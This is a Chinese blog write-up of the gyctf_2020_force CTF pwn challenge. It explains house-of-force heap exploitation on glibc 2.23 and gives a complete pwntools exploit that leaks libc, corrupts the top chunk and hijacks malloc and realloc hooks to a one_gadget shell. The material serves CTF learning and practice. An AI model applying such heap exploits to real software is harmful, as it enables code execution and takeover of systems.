gyctf_2020_force【write up】

已于 2023-04-12 10:06:28 修改
阅读量94 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
于 2023-04-11 18:39:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/130090623
版权

gyctf_2020_force

通过题目我们就可以知道这是一题house_of_force题目

需要注意的是house offorse 只在libc2.23中可用 该漏洞在libc2.27中就被修复了

惯例我们先来checksec一下

保护全开的64位程序 qwq

请添加图片描述

放进ida64里看看

main函数

请添加图片描述

add函数

每次读入都是0x50 存在堆溢出

需要注意的是此处我们申请chunk时没有限制我们的大小 又由于时libc2.23的题目我们很自然的向导利用house of force来解题

请添加图片描述

show函数感觉没啥用就不贴上来了

审题完成开始解题

泄露libc:

首先我们要申请一个非常大非常的chunk 来保证我们申请的chunk位于libc下方而不是在data段的末尾

而这羊得到的chunk的地址对于libc的偏移是固定的

原理如下

mmap

mmap是memory map的缩写即内存映射

每在物理内存中开辟一块空间 然后利用mmap映射到虚拟内存中

主线程既可用brk又可用mmap,子线程只能用mmap

其次 主线程如果盛情的内存空间过大的话会直接用mmap在mmap段拿到一块大的空间 如果申请的比较小的话直接在data段向上拓展一段空间即可

此处我申请了2097152(即0x200000)大小的chunk然后我们就发现他被分配在了libc下方

计算得到此处距离libc的距离为0x200ff0

libc_base = add(0x200000, b'aaaa') + 0x200ff0

请添加图片描述

请添加图片描述

第二步 将top chunk的size位赋值为-1(即 0xFFFFFFFFFFFFFFFF)

因为add函数中无论我们申请的大小是多少都可以修改0x50长度的内容存在堆溢出 因此我们只要申请大小为0x10的chunk然后将

heap_addr = add(0x10, b'a'*0x10+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
top=heap_addr+0x10

因为我们直接将mallochook改为onegadget失败 估计是没有满足onegadget的条件 我们便想到利用reallochook来实现onegadget

reallochook的位置在mallochook-0x8

之所以是offset-0x30是因为我们要先修改reallochook为onegadget 而offset为malloc_hook-top 因为我们第一次申请offset的时候申请一个大小为0x10的size和prevsize 而当我们第二次申请chunk用来篡改mallochook的时候的同样会申请一个大小为0x10的size和prevsize 这样就是0x20了 我们修改的位置就是mallochoo-0x10 而reallochook

请添加图片描述

可见realloc开始的时候会调用许多的push,然后rsp-0x38,一般来讲one_gadget失效就是rsp没有和0x10对齐的原因,那其实我们给rsp减掉0x38基本上就可以实现对齐了。同时注意rsp减完之后realloc会调用realloc_hook。 所以我们的做法就是劫持malloc_hook为realloc+0x10,并劫持realloc_hook为one_gadget,就可以get shell了

实际流程为 申请chunk 调用malloc chunk函数 调用malloc_hook 然而mallochook的内容被我们篡改为了realloc+0x10的地址 因此我们实际上在执行realloc的内容,然后realloc会调用realloc_hook而realloc_hook上的内容已经被我们篡改为one_gadget 因此实际上就是在执行onegadget上的内容 因此我们获得了控制权

exp:

from pwn import *
io=remote('node4.buuoj.cn',26791)
elf=ELF('./gyctf_2020_force')
libc=ELF('./libc-2.23.so')
context.log_level='debug'
one_gadget = 0x45216

def add(size, content):
    io.recvuntil("puts")
    io.sendline('1')
    io.recvuntil("size")
    io.sendline(str(size))
    io.recvuntil('0x')
    addr=int(io.recv(12),16)
    io.recvuntil("content")
    io.send(content)
    return addr

libc_base=add(0x200000,'aaaa\n')+0x200ff0
heap_addr = add(0x10, 'a'*0x10+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
top=heap_addr+0x10

malloc_hook = libc.sym['__malloc_hook']+libc_base
one_gadget = one_gadget +libc_base
realloc = libc.sym["__libc_realloc"]+libc_base
offset = malloc_hook - top
system = libc.sym['system']+libc_base
bin_sh = libc.search('/bin/sh').next()+libc_base
add(offset-0x30, 'aaa\n')
add(0x10, 'a'*8+p64(one_gadget)+p64(realloc+0x10))

io.recvuntil("puts")
io.sendline('1')
io.recvuntil("size")
io.sendline(str(20))

io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hal.rar_The Force
09-24
This is to force compiler to use the maximum of an int ( 4 bytes ).
BUUCTF【gyctf_2020_force】(house of force)
weixin_51055545的博客
01-29 616
一道题学习 House of force 首先说明一下House of force的利用条件: 1.能够通过堆溢出等方法控制到topchunk的size 2.分配的大小没有限制,即可以申请任意大小的堆块 3.能够泄露出堆地址(topchunk) House of force 产生的原因: 在于 glibc 对 top chunk 的处理,进行堆分配时,如果所有空闲的块都无法满足需求,那么就会从 top chunk 中分割出相应的大小作为堆块的空间。若 top chunk 的 size 值是由用户控制的任意的
gyctf_2020_force
z1r0的博客
01-25 825
gyctf_2020_force 查看保护 当size小于0x50时堆溢出,这里只有add没有show和edit。size随便申请多大都可以。 house of force吧,改写top chunk的size为0xFFFFFFFFFFFFFFFF因为在glibc2.23下的源码中这里是无符号写成-1时则为0xFFFFFFFFFFFFFFFF。详细可以看z1r0’s blog 当创建top chunk可以分配的大小的,所创建的chunk的位置为top chunk与该chunk size的偏移 所以这里可以
[BUUCTF]PWN——gyctf_2020_force(house of force
mcmuyanga的博客
01-29 789
gyctf_2020_force 附件 步骤
BUUCTF-PWN gyctf_2020_force(house of force
weixin_44145820的博客
04-15 1310
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force堆利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
P_C_Bruteforce.rar_VB源码_bruteforce_注册 VB
09-23
VB源码,强大无穷密码注册功能,非常值得学习
BSB.zip_rising force
09-24
rising force online game MMORPG 2003
ZFO.rar_ zero force_Zero_equalization_zero force
07-15
Simulate Zero Force equalization
VFA.rar_VFA_VFA Algorithm_virtual force
09-19
VFA(Virtual force algorithm)是一种很好的模拟物理学的方法。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8198
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
钢筋混凝土污水池及提升泵站施工方案.doc
05-03
课程设计污水处理
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
05-03
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
node-v12.22.10-linux-armv7l.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
The Experiment 3 of Engineering Electromagnetics.pdf
最新发布
05-03
The Experiment 3 of Engineering Electromagnetics.pdf
node-v12.11.0-darwin-x64.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
JSP网络购物中心毕业设计(源代码+设计说明书).zip
05-03
JSP网络购物中心毕业设计(源代码+设计说明书).zip
卷积神经网络-基于VGGNet实现的遥感图像分类算法.zip
05-03
卷积神经网络 卷积神经网络_基于VGGNet实现的遥感图像分类算法
node-v0.12.10.tar.xz
05-03
node-v0.12.10.tar
转型计划gl.ppt
05-03
转型计划gl.ppt
__attribute__ force
09-15
__attribute__ force是GCC编译器的一个特性,它用于强制执行某些行为。当应用于函数声明时,force属性告诉编译器强制内联函数,即使优化级别不够高也会进行内联展开。当应用于变量声明时,force属性告诉编译器强制将变量放在指定的内存地址上,而不是根据默认的对齐规则来决定。此外,force属性还可以应用于结构体、枚举和类型定义等。总之,__attribute__ force是GCC编译器提供的一个强制执行特性,可以在某些情况下优化代码或指定变量的存储位置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值